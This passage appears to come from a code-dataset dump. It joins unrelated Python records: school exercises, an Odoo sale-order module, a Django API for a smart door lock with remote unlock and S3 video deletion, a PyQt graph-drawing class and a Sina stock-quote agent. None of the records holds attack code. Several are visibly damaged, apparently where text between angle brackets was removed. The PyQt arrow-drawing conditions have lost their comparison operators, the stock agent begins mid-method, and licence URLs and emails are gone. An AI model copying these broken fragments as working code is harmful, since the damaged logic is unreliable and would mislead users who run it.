compare-os. mostrando na tela uma mensagem:\n- O primeiro valor é maior\n- O segundo valor é maior\n- Não existe valor maior, os dois são iguais\n\"\"\"\n\nfirst_number = int(input(\"Primeiro número: \"))\nsecond_number = int(input(\"Segundo número: \"))\n\nif first_number > second_number:\n print(\"O PRIMERIO número é o maior.\")\nelif first_number < second_number:\n print(\"O SEGUNDO número é o maior.\")\nelse:\n print(\"Os valores são iguais.\")\n","sub_path":"Curso em Video/Python/Mundo 2/Desafio 038.py","file_name":"Desafio 038.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"185026920","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2014, Matt Martz , and others\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\n# this is a windows documentation stub. actual code lives in the .ps1\n# file of the same name\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['removed'],\n 'supported_by': 'community'}\n\n\nfrom ansible.module_utils.common.removed import removed_module\n\n\nif __name__ == '__main__':\n removed_module(removed_in='2.8')\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/windows/_win_msi.py","file_name":"_win_msi.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505338888","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2017 Solucións Aloxa S.L. \n# Alexandre Díaz \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.exceptions import ValidationError\nfrom openerp.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT\nfrom openerp.tools.translate import _\nfrom .consts import PRICE_TYPES\n\nclass sale_order_line(models.Model):\n _inherit = 'sale.order.line'\n\n # FIXME: Mejor usar atributos\n manzano_width = fields.Float(string=\"Width\", required=False)\n manzano_height = fields.Float(string=\"Height\", required=False)\n product_price_type = fields.Selection(PRICE_TYPES,string='Sale Price Type',related='product_id.sale_price_type')\n\n @api.constrains('manzano_width')\n def _check_manzano_width(self):\n for record in self:\n if not record.product_id.manzano_check_sale_dim_values(record.manzano_width, record.manzano_height)[0]:\n raise ValidationError(\"Invalid width!\")\n\n @api.constrains('manzano_height')\n def _check_manzano_height(self):\n for record in self:\n if not record.product_id.manzano_check_sale_dim_values(record.manzano_width, record.manzano_height)[0]:\n raise ValidationError(\"Invalid height!\")\n\n @api.onchange('product_id', 'manzano_width', 'manzano_height')\n def product_id_change(self):\n super(sale_order_line, self).product_id_change()\n\n if not self.product_id:\n return\n\n vals = {}\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n\n width=self.manzano_width,\n height=self.manzano_height\n )\n\n if product.sale_price_type in ['table_2d', 'area'] and self.manzano_height != 0 and self.manzano_width != 0 and not self.product_id.manzano_check_sale_dim_values(self.manzano_width, self.manzano_height)[0]:\n raise ValidationError(_(\"Invalid Dimensions!\"))\n elif product.sale_price_type == 'table_1d' and self.manzano_width != 0 and not self.product_id.manzano_check_sale_dim_values(self.manzano_width, 0)[0]:\n raise ValidationError(_(\"Invalid Dimensions!\"))\n\n name = product.name_get()[0][1]\n if product.sale_price_type in ['table_2d', 'area']:\n name += ' [Width:%.2f cms x Height:%.2f cms]' % (self.manzano_width, self.manzano_height)\n elif product.sale_price_type == 'table_1d':\n name += ' [\tWidth:%.2f cms]' % (self.manzano_width)\n if product.description_sale:\n name += '\\n' + product.description_sale\n vals['name'] = name\n\n if self.order_id.pricelist_id and self.order_id.partner_id:\n vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n self.update(vals)\n\n def product_uom_change(self):\n super(sale_order_line, self).product_uom_change()\n if not self.product_uom:\n self.price_unit = 0.0\n return\n if self.order_id.pricelist_id and self.order_id.partner_id:\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date_order=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position'),\n\n width=self.manzano_width,\n height=self.manzano_height\n )\n self.price_unit = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n\n @api.multi\n def _prepare_order_line_procurement(self, group_id=False):\n self.ensure_one()\n vals = super(sale_order_line, self)._prepare_order_line_procurement(group_id=group_id)\n vals.update({\n 'manzano_width': self.manzano_width,\n 'manzano_height': self.manzano_height\n })\n return vals\n\n # BREAK INHERITANCE!!\n @api.multi\n def _action_procurement_create(self):\n \"\"\"\n Create procurements based on quantity ordered. If the quantity is increased, new\n procurements are created. If the quantity is decreased, no automated action is taken.\n \"\"\"\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n new_procs = self.env['procurement.order'] #Empty recordset\n for line in self:\n if line.state != 'sale' or not line.product_id._need_procurement():\n continue\n qty = 0.0\n for proc in line.procurement_ids:\n qty += proc.product_qty\n if float_compare(qty, line.product_uom_qty, precision_digits=precision) >= 0:\n continue\n \n if not line.order_id.procurement_group_id:\n vals = line.order_id._prepare_procurement_group()\n line.order_id.procurement_group_id = self.env[\"procurement.group\"].create(vals)\n \n vals = line._prepare_order_line_procurement(\n group_id=line.order_id.procurement_group_id.id)\n vals['product_qty'] = line.product_uom_qty - qty\n new_proc = self.env[\"procurement.order\"].with_context(\n procurement_autorun_defer=True,\n ).create(vals)\n # Do one by one because need pass specific context values\n new_proc.with_context(\n width=line.manzano_width,\n height=line.manzano_height).run()\n new_procs += new_proc\n return new_procs\n\n# def product_id_change(self):\n# res = super(sale_order_line, self).product_id_change()\n# \n# vals = {}\n# if self.order_id.pricelist_id and self.order_id.partner_id:\n# vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n# self.update(vals)\n# return res\n","sub_path":"price_dimension/models/inherit_sale_order_line.py","file_name":"inherit_sale_order_line.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"626784788","text":"#DSC 430: Python Programming - Assignment 0802: Plot Viewer\n#Student Name: Serena Yang\n#Date: Nov, 9, 2020\n#Video Link: https://youtu.be/EeO26eKQDNc\n#I have not given or received any unauthorized assistance on this assignment.\n\n\nimport random\n\n#when queried for a plot returns “Something happens”\nclass SimplePlotGenerator:\n \n #initial variable\n def registerPlotViewer(self, pg):\n self.pg = pg\n \n #in this situation, return \"something happens\"\n def generate(self):\n return \"Something happens\" \n\n#when queried for a plot returns a random plot produced from the seven files, extend SimplePlotGenerator\nclass RandomPlotGenerator(SimplePlotGenerator):\n #in this situation, return the plot by format\n def generate(self):\n\n #get each random word from 7 files\n name = random.choice(open('/Users/serenayang/Desktop/folder/plot_names.txt').read().splitlines())\n adjective = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives.txt').read().splitlines())\n profesion = random.choice(open('/Users/serenayang/Desktop/folder/plot_profesions.txt').read().splitlines())\n verb = random.choice(open('/Users/serenayang/Desktop/folder/plot_verbs.txt').read().splitlines())\n adjective_evil = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives_evil.txt').read().splitlines())\n villian_job = random.choice(open('/Users/serenayang/Desktop/folder/plot_villian_job.txt').read().splitlines())\n villain = random.choice(open('/Users/serenayang/Desktop/folder/plot_villains.txt').read().splitlines())\n\n #save as the format\n pg = name + ', a ' + adjective + ' ' + profesion + ', must ' + verb + ' the ' + adjective_evil + ' ' + villian_job + ', ' + villain + '.'\n return pg\n\n#when queried for a plot offers the user a list of five random plot_n, select each words from the fives\nclass InteractivePlotGenerator(SimplePlotGenerator):\n\n def generate(self):\n #using for loop to get 5 random lines and save in the list \n namelist = []\n for i in range(5):\n name = random.choice(open('/Users/serenayang/Desktop/folder/plot_names.txt').read().splitlines())\n namelist.append(name)\n #query user to select the name\n namechose = self.pg.queryUser(\"Chose a hero’s name from the following list: \\n\" + str(namelist) + '\\n')\n\n #same method as getting plot name\n adjectivelist = []\n for i in range(5):\n adjective = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives.txt').read().splitlines())\n adjectivelist.append(adjective)\n adjectivechose = self.pg.queryUser(\"Chose a adjective from the following list: \\n\" + str(adjectivelist) + '\\n')\n\n #same method as getting plot name\n profesionlist = []\n for i in range(5):\n profesion = random.choice(open('/Users/serenayang/Desktop/folder/plot_profesions.txt').read().splitlines())\n profesionlist.append(profesion)\n profesionchose = self.pg.queryUser(\"Chose a profesion from the following list: \\n\" + str(profesionlist) + '\\n')\n\n #same method as getting plot name\n verblist = []\n for i in range(5):\n verb = random.choice(open('/Users/serenayang/Desktop/folder/plot_verbs.txt').read().splitlines())\n verblist.append(verb)\n verbchose = self.pg.queryUser(\"Chose a verb from the following list: \\n\" + str(verblist) + '\\n')\n\n #same method as getting plot name\n adjective_evillist = []\n for i in range(5):\n adjective_evil = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives_evil.txt').read().splitlines())\n adjective_evillist.append(adjective_evil)\n adjective_evilchose = self.pg.queryUser(\"Chose a adjective evil from the following list: \\n\" + str(adjective_evillist) + '\\n')\n\n #same method as getting plot name\n villian_joblist = []\n for i in range(5):\n villian_job = random.choice(open('/Users/serenayang/Desktop/folder/plot_villian_job.txt').read().splitlines())\n villian_joblist.append(villian_job)\n villian_jobchose = self.pg.queryUser(\"Chose a villian job from the following list: \\n\" + str(villian_joblist) + '\\n')\n\n #same method as getting plot name\n villainlist = []\n for i in range(5):\n villain = random.choice(open('/Users/serenayang/Desktop/folder/plot_villains.txt').read().splitlines())\n villainlist.append(villain)\n villainchose = self.pg.queryUser(\"Chose a villain from the following list: \\n\" + str(villainlist) + '\\n')\n\n #get plot by format\n pg = name + ', a ' + adjective + ' ' + profesion + ', must ' + verb + ' the ' + adjective_evil + ' ' + villian_job + ', ' + villain + '.'\n return pg\n\n\n#responsible for displaying the results\n#I print to the console, but another viewer could 'extend' me into a advance smany GUI.\nclass PlotViewer:\n def registerPlotGenerator(self, pv):\n self.pv = pv\n self.pv.registerPlotViewer(self)\n \n #ask the user for some info if there needs me to\n def queryUser(self, str):\n return input(str)\n \n #call generate\n def generate(self):\n print(self.pv.generate())\n\n#responsible for displaying the results\n#I use some other means other than the console to interact with the user\nclass advancePlotViewer(PlotViewer):\n #I will inhereit registerDiceRoller \n\n def queryUser(self, str):\n #Here I might pop up a GUI window.\n pass\n \n def generate(self):\n #Here I present the roll in my GUI.\n pass\n\n\n#---------------------------------------------\npv = PlotViewer()\n\npv.registerPlotGenerator( SimplePlotGenerator() )\npv.generate()\n\n\npv.registerPlotGenerator( RandomPlotGenerator() )\npv.generate()\n\npv.registerPlotGenerator( InteractivePlotGenerator() ) \npv.generate()","sub_path":"Assignment_8.2.py","file_name":"Assignment_8.2.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"405788255","text":"import json\nimport jieba\nfiles = [\"companynews.txt\", \"cpinews.txt\", \"estatenews.txt\", \"gdpnews.txt\", \"industrynews.txt\", \"marketnews.txt\",\n \"ppinews.txt\", \"rmbnews.txt\"]\ndef collectFiles():\n with open(\"allnews.txt\", mode=\"w\", encoding=\"utf-8\") as allf:\n for file in files:\n with open(file, encoding=\"utf-8\") as f:\n for line in f:\n news = json.loads(line)\n content = \" \".join(jieba.cut(news[\"content\"]))\n allf.write(content + \" __label__\" + news[\"type\"] + \"\\n\")\ncollectFiles()\n","sub_path":"createTrainData.py","file_name":"createTrainData.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616560944","text":"import boto3\nimport botocore\nimport threading\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist, PermissionDenied\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\n\nfrom api.models import Video, Device, RemoteHistory, Lock, Record, Door, AddDevice\nfrom api.serializers import VideoSerializer, DeviceSerializer, RemoteHistorySerializer, RecordSerializer, LockSerializer, AddDeviceSerializer\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authentication import TokenAuthentication\n\nfrom boto3.session import Session\nfrom src.settings import AWS_REGION\nfrom src.settings import S3_ACCESS_URL\nfrom src.settings import S3_ACCESS_KEY_ID, S3_SECRET_ACCESS_KEY, S3_STORAGE_BUCKET_NAME\n\nimport time\nfrom datetime import datetime, timedelta\nimport json\nimport uuid\n# Create your views here.\n\n#로그인 및 토큰 반환\nclass Login(APIView) : \n\n def get(self, request, format = None) : # request query에 door_id 포함되어있음 : api/auth?door_id=12345\n try :\n request_id = request.GET.get('door_id', None)\n if request_id == None :\n raise FieldDoesNotExist\n queryset = Door.objects.filter(door_id = request_id) # door_id 유효성 검색\n if queryset.exists() :# 유효할 때\n userid = uuid.uuid4()\n pw = uuid.uuid4()\n user = User.objects.create_user(username=str(userid), password=str(pw))\n token = Token.objects.create(user=user)\n res = {\n 'is_available' : True,\n 'access_token' : token.key \n }\n else :\n res = {\n 'is_available' : False\n }\n\n return Response(res, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n\n\n def post(self, request, format = None) : \n Door.objects.create(door_id = 12345)\n Lock.objects.create(id=1)\n Record.objects.create(id=1)\n AddDevice.objects.create(id=1)\n return Response({\n 'msg' : 'doorid값 삽입 완료',\n })\n\n\n\n#기기 관련 api\nclass Devices(APIView) :\n # 기기 목록 조회\n def get(self, request, format = None) :\n try :\n queryset = Device.objects.all()\n serializer = DeviceSerializer(queryset, many = True)\n res = {\n 'deviceList': serializer.data\n }\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n # 기기 추가 요청\n def put(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n print(request.body)\n target = AddDevice.objects.get(id=1)\n serializer = AddDeviceSerializer(target, many=False)\n state = serializer.data['state']\n if state == False:\n print(\">> 기기추가 요청이 들어옴\")\n target.state = True\n target.save()\n return Response({\n 'msg' : 'changed state successfully'\n }, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n # 기기 추가\n def post(self, request, format = None) : # request body에 rfid_id 포함되어있음 \n try : \n print(request.data)\n request_id = request.data.get('rfid_id', None)\n if request_id == None :\n raise FieldDoesNotExist\n queryset = Device.objects.create(rfid_id = request_id)\n queryset.save()\n \n select = Device.objects.filter(rfid_id = request_id).values()\n device_id = select[0]['device_id']\n rfid_id = select[0]['rfid_id']\n created = select[0]['created']\n return Response({\n \"device_id\" : device_id,\n \"rfid_id\" : rfid_id,\n \"created\" : created\n }, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n\n\n # 기기 삭제\n def delete(self, request, device_id, format = None): # request URI에 device_id(자동생성되는 기기 고유 번호 != rfid_id) 포함\n try :\n if request.auth == None :\n raise PermissionDenied \n request_id = device_id\n if request_id == None:\n raise FieldDoesNotExist \n queryset = Device.objects.get(device_id=request_id)\n queryset.delete()\n return Response({\n 'msg' : 'success delete device'\n })\n \n except FieldDoesNotExist as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 원격 잠금 해제 \nclass Remote(APIView):\n # 원격 잠금 해제 기록 조회\n def get(self, request, format = None) : \n #models.py의 class History 사용.\n try:\n if request.auth == None :\n raise PermissionDenied \n queryset = RemoteHistory.objects.all()\n serializer = RemoteHistorySerializer(queryset, many = True)\n res = {\n \"remoteHistoryList\": serializer.data\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n # 원격 잠금 해제\n def post(self, request, format = None) :\n try:\n if request.auth == None :\n raise PermissionDenied \n print(request.body)\n data = json.loads(request.body)\n device_name = data.get('device_name', None)\n if device_name == None :\n raise FieldDoesNotExist\n else:\n target = Lock.objects.get(id=1)\n serializer = LockSerializer(target, many=False)\n state = serializer.data['state']\n if state == True:\n print(\">> 원격 잠금해제 요청이 들어옴\")\n # 기록에 저장\n now = datetime.now()\n queryset = RemoteHistory.objects.create(device_name=device_name, created=now)\n queryset.save()\n # 잠금 해제 상태로 변경\n target.state = False\n target.save()\n return Response({\n 'msg' : 'success remote unlock'\n }, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error:\n return Response({\n 'error': \"FieldDoesNotExist \",\n 'date': datetime.now()\n }, status=status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n\n\n# 비디오 목록 조회\nclass VideoList(APIView) : \n def get(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied \n queryset = Video.objects.all()\n serializer = VideoSerializer(queryset, many = True)\n res = { \n 'videoList': serializer.data\n } # 응답코드에 포함될 데이터\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error:\n return Response({\n 'error': \"FieldDoesNotExist \",\n 'date': datetime.now()\n }, status=status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 확인\nclass VideoDetail(APIView) :\n def get(self, request, vid_name, format = None) : # 요청한 URI에 vid_name가 포함되어있음\n try :\n if request.auth == None :\n raise PermissionDenied \n request_id = vid_name\n if request_id == 'None' :\n raise FieldDoesNotExist \n queryset = Video.objects.filter(vid_name = request_id) # door_id 유효성 검색\n if not queryset.exists():\n raise FieldDoesNotExist \n download_url = S3_ACCESS_URL + str(request_id) + '.mp4' # S3 다운로드 링크 변환\n if not download_url :\n raise ObjectDoesNotExist \n res = {\n 's3link' : download_url\n } # 응답 코드에 보낼 데이터\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist as error :\n return Response({\n 'error' : \"ObjectDoesNotExist\",\n 'date' : datetime.now()\n }, status = status.HTTP_404_NOT_FOUND)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 수동 삭제\n def delete(self, request, vid_name, format = None) : # request URI에 vid_name가 포함되어있음 : api/video/{vid_name}\n try : \n if request.auth == None :\n raise PermissionDenied \n request_id = vid_name\n if request_id == 'None' :\n raise FieldDoesNotExist\n session = boto3.session.Session(aws_access_key_id = S3_ACCESS_KEY_ID, aws_secret_access_key = S3_SECRET_ACCESS_KEY, region_name = AWS_REGION)\n s3 = session.client('s3')\n \n target = Video.objects.get(vid_name = request_id)\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(target.vid_name) + '.mp4')\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(target.vid_name) + '_thumb.jpg')\n target.delete()\n return Response(status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 자동 삭제\nclass CheckDate(APIView) :\n def delete(self, request, format = None) :\n checkdate = datetime.now() + timedelta(days = -7)\n quaryset = Video.objects.filter(created__lt = checkdate)\n session = boto3.session.Session(aws_access_key_id = S3_ACCESS_KEY_ID, aws_secret_access_key = S3_SECRET_ACCESS_KEY, region_name = AWS_REGION)\n s3 = session.client('s3')\n for delvid in quaryset :\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(delvid.vid_name) + '.mp4')\n quaryset.delete()\n return Response(status = status.HTTP_200_OK)\n\n# 비디오 녹화 설정 조회/변경\nclass Recording(APIView) :\n def get(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n target = Record.objects.get(id = 1)\n serializer = RecordSerializer(target, many = False)\n res = {\n 'recording' : serializer.data['recording']\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n def put(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n print(request.body)\n data = json.loads(request.body)\n if 'recording' not in data:\n raise FieldDoesNotExist\n target = Record.objects.filter(id = 1)\n target.update(recording = data['recording'])\n res = {\n 'recording' : data['recording']\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"63106660","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom Transacao import Transacao\n\nclass Vertice(object):\n \n def __init__(self,raio,texto,x,y):\n self.raio = raio\n self.texto = QString(texto)\n self.x = x\n self.y = y\n \n def drawVertice(self,painter):\n painter.drawEllipse(self.x,self.y,self.raio,self.raio)\n painter.drawText((self.x+self.raio/2)-5,(self.y+self.raio/2)+5,self.texto)\n \nclass Aresta(object):\n def __init__(self,verticeOrigem,verticeDestino):\n self.verticeOrigem = verticeOrigem\n self.verticeDestino = verticeDestino\n \n def drawAresta(self,painter):\n \n x1=self.verticeOrigem.x+self.verticeOrigem.raio/2\n y1=self.verticeOrigem.y+self.verticeOrigem.raio/2\n x2=self.verticeDestino.x+self.verticeDestino.raio/2\n y2=self.verticeDestino.y+self.verticeDestino.raio/2\n raio = self.verticeDestino.raio\n p1 = QPoint(0,0)\n p2 = QPoint(0,0)\n p3 = QPoint(0,0)\n \n \n if(x1x2 and y1y2):\n x1 = x1 + raio/3\n y1 = y1 - raio/3\n x2 = x2 - raio/3\n y2 = y2 + raio/3\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2-12)\n p1.setY(y2)\n p3.setX(x2)\n p3.setY(y2+12)\n elif(x1>x2 and y1>y2):\n x1 = x1 - raio/3\n y1 = y1 - raio/3\n x2 = x2 + raio/3\n y2 = y2 + raio/3\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2)\n p1.setY(y2+12)\n p3.setX(x2+12)\n p3.setY(y2)\n elif(x1==x2 and y1y2):\n y1 = y1 - raio/2.15\n y2 = y2 + raio/2.15\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2+9)\n p1.setY(y2+9)\n p3.setX(x2-9)\n p3.setY(y2+9)\n elif(x1>x2 and y1==y2):\n x1 = x1 - raio/2.15\n x2 = x2 + raio/2.15\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2+9)\n p1.setY(y2+9)\n p3.setX(x2+9)\n p3.setY(y2-9)\n elif(x10:\n # select host\n host = self._hosts.get()\n try:\n # make request url\n url = self._makeurl(host.host, codes)\n if url:\n # request remote service\n stime = time.time()\n resp = requests.get(url, headers=Agent.HEADERS, timeout=self._timeout)\n etime = time.time()\n\n # parse response\n result = self._parse(resp.text)\n\n # add host succeed\n host.addsucceed(etime-stime)\n\n return result\n else:\n raise Exception('not host can be used')\n except Exception as e:\n retry -= 1\n error = host.host+\":\"+str(e)\n host.addfailed(error)\n errors.append(errors)\n\n raise Exception(str(errors))\n\n def hosts(self):\n \"\"\"\n get hosts for agent\n :return:\n \"\"\"\n return self._hosts\n\n def _makeurl(self, host, codes):\n \"\"\"\n make request url by stock codes\n :param codes:\n :return:\n \"\"\"\n # make url\n sina_quote_url = \"http://\"+host+\"/rn=\"+Agent._makern()+\"&list=\"\n\n return sina_quote_url+\",\".join(Agent._addse(codes))\n\n @staticmethod\n def _makern():\n return digit.strbasen(round(random.random()*60466176), 36)\n\n @staticmethod\n def _addse(codes):\n \"\"\"\n add securities exchange flag before stock codes, like: 000001->sz000001\n :param codes: array, stock codes\n :return:\n array, stock codes with exchange flag\n \"\"\"\n ncodes = []\n for code in codes:\n ncodes.append(stock.addse(code))\n return ncodes\n\n @staticmethod\n def _parse(text):\n \"\"\"\n parse response text\n :param text:\n :return:\n \"\"\"\n # parse results\n results = []\n\n # alias for item\n alias = {\n \"jkj\": 1, \"zsj\": 2, \"dqj\": 3, \"zgj\": 4, \"zdj\": 5,\n \"cjl\": 8, \"cje\": 9,\n \"mrl1\": 10, \"mrj1\": 11, \"mrl2\": 12, \"mrj2\": 13, \"mrl3\": 14, \"mrj3\": 15, \"mrl4\": 16, \"mrj4\": 17, \"mrl5\": 18, \"mrj5\": 19,\n \"mcl1\": 20, \"mcj1\": 21, \"mcl2\": 22, \"mcj2\": 23, \"mcl3\": 24, \"mcj3\": 25, \"mcl4\": 26, \"mcj4\": 27, \"mcl5\": 28, \"mcj5\": 29,\n \"date\": 30, \"time\": 31\n }\n\n # parse all response quotes\n quotes = text.strip().split('\\n')\n\n # parse each quote\n for quote in quotes:\n items = quote.split(',')\n\n # stock code\n code = items[0].split('=')[0][-6:]\n\n qte = {}\n # stock quote\n for k in alias:\n qte[k] = items[alias[k]]\n\n # process date&time\n qte['time'] = qte['date']+\" \"+qte['time']\n del qte['date']\n\n # add to results\n results.append({'code': code, 'quote': Agent._tidy(qte)})\n\n return results\n\n def _tidy(quote):\n \"\"\"\n tidy quote data\n :param quote:\n :return:\n \"\"\"\n # prices\n prices = [\"jkj\", \"zsj\", \"dqj\", \"zgj\", \"zdj\", \"cje\", \"mrj1\", \"mrj2\", \"mrj3\", \"mrj4\", \"mrj5\", \"mcj1\", \"mcj2\", \"mcj3\", \"mcj4\", \"mcj5\"]\n\n # volumes\n volumes = [\"cjl\", \"mrl1\", \"mrl2\", \"mrl3\", \"mrl4\", \"mrl5\", \"mcl1\", \"mcl2\", \"mcl3\", \"mcl4\", \"mcl5\"]\n\n # tidy prices\n for p in prices:\n if quote.get(p) is not None:\n quote[p] = str(decimal.Decimal(quote[p]).quantize(decimal.Decimal('0.00')))\n\n # tidy volumes\n for v in volumes:\n if quote.get(v) is not None:\n quote[v] = str(math.floor(int(quote[v])/100))\n\n return quote","sub_path":"app/lib/sec/sec/stock/quote/sina/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433366301","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 5 09:08:00 2018\r\n\r\n@author: Kim Earl Lowell\r\n\"\"\"\r\n\r\n#%%\r\n# This code will read in all the ufo files pulled down previously\r\n# and convert them to a csv file. The output csv file will have two\r\n# fields -- an index ('blog') and a text field ('text').\r\n# First read the name of all the files in the directory.\r\n###################### remove CR/LF #############################\r\n# This function removes the carriage return/line feed from a string.\r\ndef rmCRLF(string):\r\n string=string.replace('\\n',' ')\r\n string=string.replace('\\r',' ')\r\n string=string.replace(',',' ')\r\n return string\r\n################## MAIN BODY OF PROGRAM ########################s\r\nfrom os import listdir\r\nimport pandas as pd\r\npathtest='C:/Analytics/DATA900/Python_III/PythIII_Assignments/20news-bydate/20news-bydate-test/talk.ufo/'\r\npathtrain='C:/Analytics/DATA900/Python_III/PythIII_Assignments/20news-bydate/20news-bydate-train/talk.ufo/'\r\noutpath='C:/Analytics/DATA902/DATA902_TextMining_Phani/TextMine_Assignments/'\r\noutfile='ufo_blogs.csv'\r\ntrainfiles=listdir(pathtrain)\r\n#print(trainfiles)\r\n# Set up 